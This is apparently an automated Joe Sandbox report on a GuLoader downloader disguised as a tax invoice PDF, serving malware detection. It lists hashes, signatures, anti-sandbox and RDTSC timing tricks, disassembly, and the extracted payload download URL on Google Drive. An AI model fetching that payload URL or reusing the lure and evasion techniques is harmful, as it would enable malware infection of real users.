Play interactive tour

Edit tour

Analysis Report NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Overview

General Information

Sample Name:	NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe
Analysis ID:	385245
MD5:	69273783da83c97ff021e1002243dd8b
SHA1:	c1f879d4c66d53ae682b870f3e9e0e016929e220
SHA256:	81980be7abe0eb985644d9c867fe8ad4820d9d6a2c9538011d67251dd9378170
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Executable has a suspicious name (potential lure to open the executable)

Found potential dummy code loops (likely to delay analysis)

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected potential crypto function

Found large amount of non-executed APIs

PE file contains strange resources

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe' MD5: 69273783DA83C97FF021E1002243DD8B)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1vOQNsh0Cmxl5hty4ZPc18pGNKUD5RTVY"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1vOQNsh0Cmxl5hty4ZPc18pGNKUD5RTVY"}

Multi AV Scanner detection for submitted file

Show sources

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Virustotal: Detection: 61%	Perma Link
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Metadefender: Detection: 32%	Perma Link
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	ReversingLabs: Detection: 60%

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1vOQNsh0Cmxl5hty4ZPc18pGNKUD5RTVY

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Code function: 0_2_0041153C OpenClipboard,

0_2_0041153C

System Summary:

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Code function: 0_2_00406CA0

0_2_00406CA0

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe, 00000000.00000000.643666689.000000000041B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStringet3.exe vs NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Binary or memory string: OriginalFilenameStringet3.exe vs NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal96.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Temp\~DFC8581C4ED5AF02EC.TMP

Jump to behavior

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Virustotal: Detection: 61%
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Metadefender: Detection: 32%
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	ReversingLabs: Detection: 60%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100, type: MEMORY

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040245C pushfd ; iretd	0_2_0040248B
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00408824 pushfd ; iretd	0_2_00408987
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00409083 push ecx; retf	0_2_00409086
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040248C pushfd ; iretd	0_2_0040248F
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_004094B3 push ecx; retf	0_2_0040952E
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040A949 push ecx; retf	0_2_0040A94A
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00408963 pushfd ; iretd	0_2_00408987
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00409501 push ecx; retf	0_2_0040952E
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040812A push ecx; retf	0_2_0040812E
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_004089C4 push ecx; iretd	0_2_004089EE
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_004051D6 pushfd ; iretd	0_2_004051D7
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040898C push ecx; iretd	0_2_004089EE
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040A9A5 push ecx; iretd	0_2_0040A9AA
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00403278 push dword ptr [edi-4B012F33h]; retf	0_2_0040328B
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00408A19 push ecx; iretd	0_2_00408A22
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040962B push ecx; retf	0_2_00409632
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00407EE5 push ecx; iretd	0_2_00407EE6
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040A2F1 push ecx; retf	0_2_0040A2F2
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_004036FA push fs; ret	0_2_00403793
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00402690 pushfd ; iretd	0_2_00402693
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_0040A2B5 push ecx; retf	0_2_0040A2B6
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00407F47 push ecx; retf	0_2_00407F4A
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00402F67 pushfd ; iretd	0_2_00402F6F
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00403320 pushfd ; iretd	0_2_00403323
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00408B23 pushad ; iretd	0_2_00408B26
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00408B28 push ecx; iretd	0_2_00408B3A
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_004043D7 pushfd ; iretd	0_2_004043DB
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_00408FB3 push ecx; iretd	0_2_00408FC2
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_02233AF3 push FFFFFFB9h; retf	0_2_02233AF5
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_02234ED0 push eax; ret	0_2_02234ED1

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

RDTSC instruction interceptor: First address: 0000000002234171 second address: 0000000002234171 instructions:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	RDTSC instruction interceptor: First address: 0000000002234900 second address: 0000000002234171 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp dh, FFFFFF96h 0x0000000e cmp cx, FBFCh 0x00000013 cmp bl, dl 0x00000015 mov eax, 00000539h 0x0000001a mov ecx, dword ptr [ebp+1Ch] 0x0000001d cmp dl, FFFFFFD9h 0x00000020 mov edx, 8802EDACh 0x00000025 call 00007F9D583648CCh 0x0000002a push esi 0x0000002b push edx 0x0000002c jmp 00007F9D583651BDh 0x00000031 pushad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	RDTSC instruction interceptor: First address: 0000000002234171 second address: 0000000002234171 instructions:
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	RDTSC instruction interceptor: First address: 000000000223474E second address: 000000000223474E instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9D5836512Eh 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F9D5836510Ch 0x0000002e call 00007F9D58365156h 0x00000033 call 00007F9D5836513Eh 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Code function: 0_2_02234771 rdtsc

0_2_02234771

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

API coverage: 1.2 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Code function: 0_2_02234771 rdtsc

0_2_02234771

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_02231868 mov eax, dword ptr fs:[00000030h]	0_2_02231868
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_022340BB mov eax, dword ptr fs:[00000030h]	0_2_022340BB
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_02234523 mov eax, dword ptr fs:[00000030h]	0_2_02234523
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_02231530 mov eax, dword ptr fs:[00000030h]	0_2_02231530
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Code function: 0_2_022325D3 mov eax, dword ptr fs:[00000030h]	0_2_022325D3

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe, 00000000.00000002.1166538080.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe, 00000000.00000002.1166538080.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe, 00000000.00000002.1166538080.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe, 00000000.00000002.1166538080.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Code function: 0_2_02233972 cpuid

0_2_02233972

Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery411	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery221	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	61%	Virustotal		Browse
NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	32%	Metadefender		Browse
NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe	60%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385245
Start date:	12.04.2021
Start time:	08:57:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 6.4% (good quality ratio 6.4%) Quality average: 55.8% Quality standard deviation: 12%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.7345833661144345
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe
File size:	131072
MD5:	69273783da83c97ff021e1002243dd8b
SHA1:	c1f879d4c66d53ae682b870f3e9e0e016929e220
SHA256:	81980be7abe0eb985644d9c867fe8ad4820d9d6a2c9538011d67251dd9378170
SHA512:	6bf65db5a6798bfe67e935351357d99f9fc531f9a3d94aec4b20b67fed94135d51f948a4f2a3ed7d53e922d5da808ea3a6f18cfc18f1021313ce3420e73f1837
SSDEEP:	1536:P2GouBbBuyXebN6nGZ+yIbpklD0o/WlQgWs6WcpvihGo:+GZBb9nttbpvQ7s8pvihG
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...-.!M.....................`....................@................

File Icon


Icon Hash:	0ccea09899191898

Static PE Info

General
Entrypoint:	0x4016bc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4D21FF2D [Mon Jan 3 16:54:05 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b99d75676bd131a32dd8593967e4443d

Entrypoint Preview

Instruction
push 00410D34h
call 00007F9D58BCA873h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
retn 3C04h
pop ebp
retn 78C8h
dec ebx
xchg eax, ebx
popfd
add byte ptr [edi+3A915898h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
jo 00007F9D58BCA8A2h
and byte ptr [eax], ah
and byte ptr [eax], ah
push ebx
je 00007F9D58BCA8E7h
outsb
bound edi, dword ptr [eax]
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
sub byte ptr [eax-1Fh], ah
shr dword ptr [ebx], cl
push cs
push ds
dec ebx
inc esp
mov dh, BCh
cwde
adc byte ptr [ebp+5Fh], dh
cwde
out CCh, al
les esp, eax
and eax, 46E3687Bh
movsb
jp 00007F9D58BCA86Bh
mov bl, 32h
call 00007F9DA7F78877h
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esi
cmc
add byte ptr [eax], al
rol dword ptr [eax+eax+00h], 1
add byte ptr [eax+eax], al
dec ebp
outsb
jnc 00007F9D58BCA882h
or eax, 50000601h
outsd
jnc 00007F9D58BCA8F6h
je 00007F9D58BCA8B3h
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx
add byte ptr [edx], ah
add byte ptr [ebx], ah
mov es, word ptr [eax+eax+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18b64	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1b000	0x485e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x160	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x180e8	0x19000	False	0.39478515625	data	6.26229031411	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1a000	0xaf4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1b000	0x485e	0x5000	False	0.4140625	data	4.36108868789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1d2b6	0x25a8	data
RT_ICON	0x1c20e	0x10a8	data
RT_ICON	0x1b886	0x988	data
RT_ICON	0x1b41e	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1b3e0	0x3e	data
RT_VERSION	0x1b180	0x260	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Stringet3
FileVersion	3.00
CompanyName	Salty
Comments	Salty
ProductName	Salty
ProductVersion	3.00
FileDescription	Salty
OriginalFilename	Stringet3.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100 Parent PID: 5944

General

Start time:	08:58:18
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe
Wow64 process (32bit):	true
